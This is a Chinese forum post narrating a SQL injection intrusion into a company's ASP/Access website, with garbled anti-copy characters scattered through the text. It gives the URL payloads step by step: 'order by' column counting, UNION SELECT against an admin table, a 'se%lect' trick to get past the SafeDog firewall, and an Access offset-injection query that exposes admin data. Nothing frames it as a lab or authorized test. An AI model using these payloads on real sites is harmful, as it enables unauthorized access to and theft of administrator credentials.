打开网站,一个企业站。' F& `! w, `; b( S1 a1 y) ~' J
8 \/ n- ]* L" K
^6 V/ X4 w L5 l1 f" D顺手加个admin% J; ^8 y/ F1 j+ c) j1 ^% o
- Y8 j6 a& @: D1 P! G, {. A6 n# g5 F% K0 ]6 k
默认后台。
, v5 X2 W7 ?1 x" e5 |0 }& O7 ?回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。# G" p* z0 B [" X! \6 |
+ X( M9 C2 D6 L& w; K. q; c2 Z, r5 p7 F5 I7 F& \' D- I
' b! o$ d+ D: Z9 P/ A所以就不用御剑扫了,待会直接封IP。& {/ E' i L* u2 p) W: j( R
" E" a+ I1 |+ p, U" E+ }
用order by语句判断是否存在注入。
( L$ f$ m& y/ y: _( e9 G: Q) p* _. E. Khttp://www.xxx.com /product_show.asp?id=997 order by 14 d8 K, n: g4 l2 w1 [+ O
http://www.xxx.com /product_show.asp?id=997 order by 100
5 _$ _5 l4 x8 e8 I& y7 J, O, K现在存在注入,经测试后发现是9个字段。3 \9 J+ c, n- V- Z/ t$ P" ?
1 i. Z/ M% ]& p) K% n# L
接下来进行联合查询,猜是否存在admin表。
* f4 `5 e5 @/ ` M: Ohttp://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。; E6 p8 j+ n3 w- l$ B% I
! `" X% L1 z- F, R& s% \/ H& [! I2 p8 O
& w. X4 v5 Z- W' I I4 H在select中间加个%,se%lect绕过安全狗。
, T; [1 `9 H( `- o0 F4 @* s1 J+ J# D1 W& U8 h/ S+ L
8 W& [" j" m3 ]% @, Q3 L0 h
发现存在admin表,然后开始手工猜常用的字段。
8 n1 i/ Q8 L; b2 Q纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。0 S8 N! [( `& i* U7 |
2 A3 J C0 K: z" u突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。7 b) m0 e8 N# J! \+ n& W6 [! p
, I* M$ O! c. s7 i5 g
科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。. b5 `( x/ m" W! J
http://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin0 m4 B; ]. N, l. N7 K) a$ b) W
好了,敏感内容出显了。
: K* Z' _7 X0 c4 P
1 P, B9 |4 a! m& V+ R
/ O+ [. z! y- t( U" G3 |* T0 E
% h; w; Y3 M; c' I. R0 \+ C |